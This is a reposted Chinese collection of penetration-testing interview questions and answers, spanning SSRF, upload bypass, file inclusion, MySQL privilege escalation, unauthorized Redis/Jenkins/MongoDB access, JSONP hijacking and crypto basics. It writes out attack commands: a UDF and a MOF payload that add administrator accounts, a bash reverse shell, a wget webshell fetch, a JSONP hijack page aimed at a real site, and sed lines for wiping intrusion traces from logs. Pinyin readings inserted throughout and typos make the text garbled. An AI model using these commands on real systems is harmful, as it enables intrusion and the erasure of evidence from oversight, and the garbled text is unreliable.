針對token，對token測試會注意哪方面內(nèi)容，會對token的哪方面進(jìn)行測試？

引用一段請教前輩的回答：

針對token的攻擊，一是對它本身的攻擊，重放測試一次性、分析加密規(guī)則、校驗(yàn)方式是否正確等，二是結(jié)合信息泄露漏洞對它的獲取，結(jié)合著發(fā)起組合攻擊 信息泄露有可能是緩存、日志、get，也有可能是利用跨站 很多跳轉(zhuǎn)登錄的都依賴token，有一個(gè)跳轉(zhuǎn)漏洞加反射型跨站就可以組合成登錄劫持了 另外也可以結(jié)合著其它業(yè)務(wù)來描述token的安全性及設(shè)計(jì)不好怎么被繞過比如搶紅包業(yè)務(wù)之類的

SSRF

SSRF(Server-Side Request Forgery:服務(wù)器端請求偽造) 是一種由攻擊者構(gòu)造形成由服務(wù)端發(fā)起請求的一個(gè)安全漏洞。一般情況下，SSRF攻擊的目標(biāo)是從外網(wǎng)無法訪問的內(nèi)部系統(tǒng)。（正是因?yàn)樗怯煞?wù)端發(fā)起的，所以它能夠請求到與它相連而與外網(wǎng)隔離的內(nèi)部系統(tǒng)）

SSRF 形成的原因大都是由于服務(wù)端提供了從其他服務(wù)器應(yīng)用獲取數(shù)據(jù)的功能且沒有對目標(biāo)地址做過濾與限制。比如從指定URL地址獲取網(wǎng)頁文本內(nèi)容，加載指定地址的圖片，下載等等。

檢測

SSRF漏洞的驗(yàn)證方法：

1）因?yàn)镾SRF漏洞是讓服務(wù)器發(fā)送請求的安全漏洞，所以我們就可以通過抓包分析發(fā)送的請求是否是由服務(wù)器的發(fā)送的，從而來判斷是否存在SSRF漏洞

2）在頁面源碼中查找訪問的資源地址 ，如果該資源地址類型為 www.baidu.com/xxx.php?image=（地址）的就可能存在SSRF漏洞 4[1]

SSRF漏洞的成因 防御 繞過

成因：模擬服務(wù)器對其他服務(wù)器資源進(jìn)行請求，沒有做合法性驗(yàn)證。利用：構(gòu)造惡意內(nèi)網(wǎng)IP做探測，或者使用其余所支持的協(xié)議對其余服務(wù)進(jìn)行攻擊。防御：禁止跳轉(zhuǎn)，限制協(xié)議，內(nèi)外網(wǎng)限制，URL限制。繞過：使用不同協(xié)議，針對IP，IP格式的繞過，針對URL，惡意URL增添其他字符，@之類的。301跳轉(zhuǎn)+dns rebindding。

上傳

文件上傳漏洞原理

由于程序員在對用戶文件上傳部分的控制不足或者處理缺陷，而導(dǎo)致用戶可以越過其本身權(quán)限向服務(wù)器上傳可執(zhí)行的動(dòng)態(tài)腳本文件

常見的上傳繞過方式

前端js驗(yàn)證：禁用js/burp改包 大小寫 雙重后綴名 過濾繞過 pphphp->php

防護(hù)

文件上傳目錄設(shè)置為不可執(zhí)行 使用白名單判斷文件上傳類型 用隨機(jī)數(shù)改寫文件名和路徑

審查上傳點(diǎn)的元素有什么意義？

有些站點(diǎn)的上傳文件類型的限制是在前端實(shí)現(xiàn)的，這時(shí)只要增加上傳類型就能突破限制了。

文件包含

原理

引入一段用戶能控制的腳本或代碼，并讓服務(wù)器端執(zhí)行 include()等函數(shù)通過動(dòng)態(tài)變量的方式引入需要包含的文件； 用戶能夠控制該動(dòng)態(tài)變量。

導(dǎo)致文件包含的函數(shù)

PHP：include(), include_once(), require(), re-quire_once(), fopen(), readfile(), … JSP/Servlet：ava.io.File(), java.io.Fil-eReader(), … ASP：include file, include virtual,

本地文件包含

能夠打開并包含本地文件的漏洞，被稱為本地文件包含漏洞

金融行業(yè)常見邏輯漏洞

單針對金融業(yè)務(wù)的 主要是數(shù)據(jù)的篡改(涉及金融數(shù)據(jù)，或部分業(yè)務(wù)的判斷數(shù)據(jù))，由競爭條件或者設(shè)計(jì)不當(dāng)引起的薅羊毛，交易/訂單信息泄露，水平越權(quán)對別人的賬戶查看或惡意操作，交易或業(yè)務(wù)步驟繞過。

中間人攻擊

中間人攻擊是一個(gè)（缺乏）相互認(rèn)證的攻擊；由于客戶端與服務(wù)器之間在SSL握手的過程中缺乏相互認(rèn)證而造成的漏洞

防御中間人攻擊的方案通常基于一下幾種技術(shù)

1.公鑰基礎(chǔ)建設(shè)PKI 使用PKI相互認(rèn)證機(jī)制，客戶端驗(yàn)證服務(wù)器，服務(wù)器驗(yàn)證客戶端；上述兩個(gè)例子中都是只驗(yàn)證服務(wù)器，這樣就造成了SSL握手環(huán)節(jié)的漏洞，而如果使用相互認(rèn)證的的話，基本可以更強(qiáng)力的相互認(rèn)證

2.延遲測試

使用復(fù)雜加密哈希函數(shù)進(jìn)行計(jì)算以造成數(shù)十秒的延遲；如果雙方通常情況下都要花費(fèi)20秒來計(jì)算，并且整個(gè)通訊花費(fèi)了60秒計(jì)算才到達(dá)對方，這就能表明存在第三方中間人。

3.使用其他形式的密鑰交換形式

ARP欺騙

原理

每臺主機(jī)都有一個(gè)ARP緩存表，緩存表中記錄了IP地址與MAC地址的對應(yīng)關(guān)系，而局域網(wǎng)數(shù)據(jù)傳輸依靠的是MAC地址。在ARP緩存表機(jī)制存在一個(gè)缺陷，就是當(dāng)請求主機(jī)收到ARP應(yīng)答包后，不會去驗(yàn)證自己是否向?qū)Ψ街鳈C(jī)發(fā)送過ARP請求包，就直接把這個(gè)返回包中的IP地址與MAC地址的對應(yīng)關(guān)系保存進(jìn)ARP緩存表中，如果原有相同IP對應(yīng)關(guān)系，原有的則會被替換。這樣攻擊者就有了偷聽主機(jī)傳輸?shù)臄?shù)據(jù)的可能

防護(hù)

1.在主機(jī)綁定網(wǎng)關(guān)MAC與IP地址為靜態(tài)（默認(rèn)為動(dòng)態(tài)），命令：arp -s 網(wǎng)關(guān)IP 網(wǎng)關(guān)MAC

2.在網(wǎng)關(guān)綁定主機(jī)MAC與IP地址

3.使用ARP防火墻

DDOS

Ddos原理

利用合理的請求造成資源過載，導(dǎo)致服務(wù)不可用

syn洪流的原理

偽造大量的源IP地址，分別向服務(wù)器端發(fā)送大量的SYN包，此時(shí)服務(wù)器端會返回SYN/ACK包，因?yàn)樵吹刂肥莻卧斓?#xff0c;所以偽造的IP并不會應(yīng)答，服務(wù)器端沒有收到偽造IP的回應(yīng)，會重試3～5次并且等待一個(gè)SYNTime（一般為30秒至2分鐘），如果超時(shí)則丟棄這個(gè)連接。攻擊者大量發(fā)送這種偽造源地址的SYN請求，服務(wù)器端將會消耗非常多的資源（CPU和內(nèi)存）來處理這種半連接，同時(shí)還要不斷地對這些IP進(jìn)行SYN+ACK重試。最后的結(jié)果是服務(wù)器無暇理睬正常的連接請求，導(dǎo)致拒絕服務(wù)。

CC攻擊原理

對一些消耗資源較大的應(yīng)用頁面不斷發(fā)起正常的請求，以達(dá)到消耗服務(wù)端資源的目的。

DDOS防護(hù)

SYN Cookie/SYN Proxy、safereset等算法。SYN Cookie的主要思想是為每一個(gè)IP地址分配一個(gè)“Cookie”，并統(tǒng)計(jì)每個(gè)IP地址的訪問頻率。如果在短時(shí)間內(nèi)收到大量的來自同一個(gè)IP地址的數(shù)據(jù)包，則認(rèn)為受到攻擊，之后來自這個(gè)IP地址的包將被丟棄。

提權(quán)

mysql兩種提權(quán)方式

udf提權(quán),mof提權(quán)

Mysql_UDF提權(quán)

要求: 1.目標(biāo)系統(tǒng)是Windows(Win2000,XP,Win2003)；2.擁有MYSQL的某個(gè)用戶賬號，此賬號必須有對mysql的insert和delete權(quán)限以創(chuàng)建和拋棄函數(shù) 3.有root賬號密碼 導(dǎo)出udf: MYSQL 5.1以上版本，必須要把udf.dll文件放到MYSQL安裝目錄下的lib\plugin文件夾下才能創(chuàng)建自定義函數(shù) 可以再mysql里輸入select @@basedirshow variables like ‘%plugins%’ 尋找mysql安裝路徑 提權(quán):

使用SQL語句創(chuàng)建功能函數(shù)。語法：Create Function 函數(shù)名（函數(shù)名只能為下面列表中的其中之一）returns string soname ‘導(dǎo)出的DLL路徑’；

create function cmdshell returns string soname ‘udf.dll’ select cmdshell(‘net user arsch arsch /add’); select cmdshell(‘net localgroup administrators arsch /add’);drop function cmdshell;

該目錄默認(rèn)是不存在的，這就需要我們使用webshell找到MYSQL的安裝目錄，并在安裝目錄下創(chuàng)建lib\plugin文件夾，然后將udf.dll文件導(dǎo)出到該目錄即可。

Mysql mof提權(quán)

#pragma namespace("\\\\.\\root\\subscription")instance of __EventFilter as $EventFilter { EventNamespace = "Root\\Cimv2"; Name = "filtP2"; Query = "Select * From __InstanceModificationEvent " "Where TargetInstance Isa \"Win32_LocalTime\" " "And TargetInstance.Second = 5"; QueryLanguage = "WQL"; };instance of ActiveScriptEventConsumer as $Consumer { Name = "consPCSV2"; ScriptingEngine = "JScript"; ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user waitalone waitalone.cn /add\")"; };instance of __FilterToConsumerBinding { Consumer = $Consumer; Filter = $EventFilter; };

其中的第18行的命令，上傳前請自己更改。

2、執(zhí)行l(wèi)oad_file及into dumpfile把文件導(dǎo)出到正確的位置即可。

select load file('c:/wmpub/nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mov'

執(zhí)行成功后，即可添加一個(gè)普通用戶，然后你可以更改命令，再上傳導(dǎo)出執(zhí)行把用戶提升到管理員權(quán)限，然后3389連接之就ok了。

特殊漏洞

Struts2-045

Redis未授權(quán)訪問

產(chǎn)生原因

Redis 默認(rèn)情況下，會綁定在 0.0.0.0:6379，這樣將會將 Redis 服務(wù)暴露到公網(wǎng)上，如果在沒有開啟認(rèn)證的情況下，可以導(dǎo)致任意用戶在可以訪問目標(biāo)服務(wù)器的情況下未授權(quán)訪問 Redis 以及讀取 Redis 的數(shù)據(jù)。攻擊者在未授權(quán)訪問 Redis 的情況下可以利用 Redis 的相關(guān)方法，可以成功在 Redis 服務(wù)器上寫入公鑰，進(jìn)而可以使用對應(yīng)私鑰直接登錄目標(biāo)服務(wù)器

利用條件和方法

條件:

a、redis服務(wù)以root賬戶運(yùn)行 b、redis無密碼或弱密碼進(jìn)行認(rèn)證 c、redis監(jiān)聽在0.0.0.0公網(wǎng)上

方法:

a、通過 Redis 的 INFO 命令, 可以查看服務(wù)器相關(guān)的參數(shù)和敏感信息, 為攻擊者的后續(xù)滲透做鋪墊 b、上傳SSH公鑰獲得SSH登錄權(quán)限 c、通過crontab反彈shell d、slave主從模式利用

修復(fù)

密碼驗(yàn)證 降權(quán)運(yùn)行 限制ip/修改端口

Jenkins未授權(quán)訪問

攻擊者通過未授權(quán)訪問進(jìn)入腳本命令執(zhí)行界面執(zhí)行攻擊指令

println "ifconfig -a".execute().text 執(zhí)行一些系統(tǒng)命令,利用wget下載webshell

MongoDB未授權(quán)訪問

開啟MongoDB服務(wù)時(shí)不添加任何參數(shù)時(shí),默認(rèn)是沒有權(quán)限驗(yàn)證的,而且可以遠(yuǎn)程訪問數(shù)據(jù)庫，登錄的用戶可以通過默認(rèn)端口無需密碼對數(shù)據(jù)庫進(jìn)行增、刪、改、查等任意高危操作。

防護(hù)

1、為MongoDB添加認(rèn)證：1)MongoDB啟動(dòng)時(shí)添加–auth參數(shù) 2)給MongoDB添加用戶：use admin #使用admin庫 db.addUser(“root”, “123456”) #添加用戶名root密碼123456的用戶 db.auth(“root”,“123456”) #驗(yàn)證下是否添加成功，返回1說明成功 2、禁用HTTP和REST端口 MongoDB自身帶有一個(gè)HTTP服務(wù)和并支持REST接口。在2.6以后這些接口默認(rèn)是關(guān)閉的。mongoDB默認(rèn)會使用默認(rèn)端口監(jiān)聽web服務(wù)，一般不需要通過web方式進(jìn)行遠(yuǎn)程管理，建議禁用。修改配置文件或在啟動(dòng)的時(shí)候選擇–nohttpinterface 參數(shù)nohttpinterface=false 3、限制綁定IP 啟動(dòng)時(shí)加入?yún)?shù) –bind_ip 127.0.0.1 或在/etc/mongodb.conf文件中添加以下內(nèi)容：bind_ip = 127.0.0.1

Memcache未授權(quán)訪問

Memcached是一套常用的key-value緩存系統(tǒng)，由于它本身沒有權(quán)限控制模塊，所以對公網(wǎng)開放的Memcache服務(wù)很容易被攻擊者掃描發(fā)現(xiàn)，攻擊者通過命令交互可直接讀取Memcached中的敏感信息。

利用

1、登錄機(jī)器執(zhí)行netstat -an |more命令查看端口監(jiān)聽情況。回顯0.0.0.0:11211表示在所有網(wǎng)卡進(jìn)行監(jiān)聽，存在memcached未授權(quán)訪問漏洞。

2、telnet 11211，或nc -vv 11211，提示連接成功表示漏洞存在

漏洞加固

a、設(shè)置memchached只允許本地訪問 b、禁止外網(wǎng)訪問Memcached 11211端口 c、編譯時(shí)加上–enable-sasl，啟用SASL認(rèn)證

FFMPEG 本地文件讀取漏洞

原理

通過調(diào)用加密API將payload加密放入一個(gè)會被執(zhí)行的段字節(jié)中。但是具體回答工程中我只回答道了SSRF老洞，m3u8頭，偏移量，加密。

安全知識

WEB

常用WEB開發(fā)JAVA框架

STRUTS,SPRING 常見的java框架漏洞 其實(shí)面試官問這個(gè)問題的時(shí)候我不太清楚他要問什么，我提到struts的045 048，java常見反序列化。045 錯(cuò)誤處理引入了ognl表達(dá)式 048 封裝action的過程中有一步調(diào)用getstackvalue遞歸獲取ognl表達(dá)式 反序列化 操作對象，通過手段引入。apache common的反射機(jī)制、readobject的重寫，其實(shí)具體的我也記不清楚。。。然后這部分就結(jié)束了

同源策略

同源策略限制不同源對當(dāng)前document的屬性內(nèi)容進(jìn)行讀取或設(shè)置。不同源的區(qū)分：協(xié)議、域名、子域名、IP、端口，以上有不同時(shí)即不同源。

Jsonp安全攻防技術(shù)，怎么寫Jsonp的攻擊頁面？

涉及到Jsonp的安全攻防內(nèi)容

JSON劫持、Callback可定義、JSONP內(nèi)容可定義、Content-type不為json。

攻擊頁面

JSON劫持，跨域劫持敏感信息，頁面類似于

function wooyun(v){ alert(v.username); } </script> <script src="http://js.login.360.cn/?o=sso&m=info&func=wooyun"></script>

Content-type不正確情況下，JSONP和Callback內(nèi)容可定義可造成XSS。JSONP和FLASH及其他的利用參照知道創(chuàng)宇的JSONP安全攻防技術(shù)。

PHP

php中命令執(zhí)行涉及到的函數(shù)

1，代碼執(zhí)行：eval()、assert()、popen()、system()、exec()、shell_exec()、passthru(),pcntl_exec(),call_user_func_array(),create_function() 2，文件讀取：file_get_contents(),highlight_file(),fopen(),read file(),fread(),fgetss(), fgets(),parse_ini_file(),show_source(),file()等 3，命令執(zhí)行：system(), exec(), shell_exec(), passthru() ,pcntl_exec(), popen(),proc_open()

安全模式下繞過php的disable fuction

DL函數(shù)，組件漏洞，環(huán)境變量。

PHP弱類型

== 在進(jìn)行比較的時(shí)候，會先將字符串類型轉(zhuǎn)化成相同，再比較

如果比較一個(gè)數(shù)字和字符串或者比較涉及到數(shù)字內(nèi)容的字符串，則字符串會被轉(zhuǎn)換成數(shù)值并且比較按照數(shù)值來進(jìn)行

0e開頭的字符串等于0

數(shù)據(jù)庫

各種數(shù)據(jù)庫文件存放的位置

mysql:

/usr/local/mysql/data/

C:\ProgramData\MySQL\MySQL Server 5.6\Data\

oracle:$ORACLE_BASE/oradata/$ORACLE_SID/

系統(tǒng)

如何清理日志

meterpreter: clearev

入侵 Linux 服務(wù)器后需要清除哪些日志？

web日志，如apache的access.log,error.log。直接將日志清除過于明顯,一般使用sed進(jìn)行定向清除

e.g. sed -i -e ‘/192.169.1.1/d’

history命令的清除，也是對~/.bash_history進(jìn)行定向清除

wtmp日志的清除，/var/log/wtmp

登錄日志清除 /var/log/secure

LINUX

查看當(dāng)前端口連接的命令有哪些？netstat 和 ss 命令的區(qū)別和優(yōu)缺點(diǎn)

netstat -antp` `ss -l

ss的優(yōu)勢在于它能夠顯示更多更詳細(xì)的有關(guān)TCP和連接狀態(tài)的信息，而且比netstat更快速更高效。

反彈 shell 的常用命令？一般常反彈哪一種 shell？為什么?

bash -i>&/dev/tcp/x.x.x.x/4444 0>&1

通過Linux系統(tǒng)的/proc目錄 ，能夠獲取到哪些信息，這些信息可以在安全上有哪些應(yīng)用？

ls /proc

系統(tǒng)信息，硬件信息，內(nèi)核版本，加載的模塊，進(jìn)程

linux系統(tǒng)中，檢測哪些配置文件的配置項(xiàng)，能夠提升SSH的安全性。

/etc/ssh/sshd___configiptables配置

如何一條命令查看文件內(nèi)容最后一百行

tail -n 100 filename

Windows

如何加固一個(gè)域環(huán)境下的Windows桌面工作環(huán)境？請給出你的思路。

密碼學(xué)

AES／DES的具體工作步驟

RSA算法

加密:

密文＝明文^EmodN

RSA加密是對明文的E次方后除以N后求余數(shù)的過程

公鑰＝(E,N)

解密:

明文＝密文^DmodN私鑰＝(D,N)

三個(gè)參數(shù)n,e1,e2

n是兩個(gè)大質(zhì)數(shù)p,q的積

分組密碼的加密模式

如何生成一個(gè)安全的隨機(jī)數(shù)？

引用之前一個(gè)學(xué)長的答案，可以通過一些物理系統(tǒng)生成隨機(jī)數(shù)，如電壓的波動(dòng)、磁盤磁頭讀/寫時(shí)的尋道時(shí)間、空中電磁波的噪聲等。

SSL握手過程

建立TCP連接、客戶端發(fā)送SSL請求、服務(wù)端處理SSL請求、客戶端發(fā)送公共密鑰加密過的隨機(jī)數(shù)據(jù)、服務(wù)端用私有密鑰解密加密后的隨機(jī)數(shù)據(jù)并協(xié)商暗號、服務(wù)端跟客戶端利用暗號生成加密算法跟密鑰key、之后正常通信。這部分本來是忘了的，但是之前看SSL Pinning的時(shí)候好像記了張圖在腦子里，掙扎半天還是沒敢確定，遂放棄。。。

對稱加密與非對稱加密的不同，分別用在哪些方面

TCP/IP

TCP三次握手的過程以及對應(yīng)的狀態(tài)轉(zhuǎn)換

（1）客戶端向服務(wù)器端發(fā)送一個(gè)SYN包，包含客戶端使用的端口號和初始序列號x; （2）服務(wù)器端收到客戶端發(fā)送來的SYN包后，向客戶端發(fā)送一個(gè)SYN和ACK都置位的TCP報(bào)文，包含確認(rèn)號xx1和服務(wù)器端的初始序列號y; （3）客戶端收到服務(wù)器端返回的SYNSACK報(bào)文后，向服務(wù)器端返回一個(gè)確認(rèn)號為yy1、序號為xx1的ACK報(bào)文，一個(gè)標(biāo)準(zhǔn)的TCP連接完成。

TCP和UDP協(xié)議區(qū)別

tcp面向連接,udp面向報(bào)文 tcp對系統(tǒng)資源的要求多 udp結(jié)構(gòu)簡單 tcp保證數(shù)據(jù)完整性和順序，udp不保證

https的建立過程

a、客戶端發(fā)送請求到服務(wù)器端 b、服務(wù)器端返回證書和公開密鑰，公開密鑰作為證書的一部分而存在 c、客戶端驗(yàn)證證書和公開密鑰的有效性，如果有效，則生成共享密鑰并使用公開密鑰加密發(fā)送到服務(wù)器端 d、服務(wù)器端使用私有密鑰解密數(shù)據(jù)，并使用收到的共享密鑰加密數(shù)據(jù)，發(fā)送到客戶端 e、客戶端使用共享密鑰解密數(shù)據(jù) f、SSL加密建立

流量分析

wireshark簡單的過濾規(guī)則

過濾ip:

過濾源ip地址:ip.src==1.1.1.1;,目的ip地址:ip.dst==1.1.1.1;

過濾端口:

過濾80端口:tcp.port==80,源端口:tcp.srcport==80,目的端口:tcp.dstport==80

協(xié)議過濾:

直接輸入?yún)f(xié)議名即可,如http協(xié)議http

http模式過濾:

過濾get/post包http.request.mothod=="GET/POST"

給原作者一個(gè)贊哦。

總結(jié)

以上是生活随笔為你收集整理的渗透面试题的全部內(nèi)容，希望文章能夠幫你解決所遇到的問題。

如果覺得生活随笔網(wǎng)站內(nèi)容還不錯(cuò)，歡迎將生活随笔推薦給好友。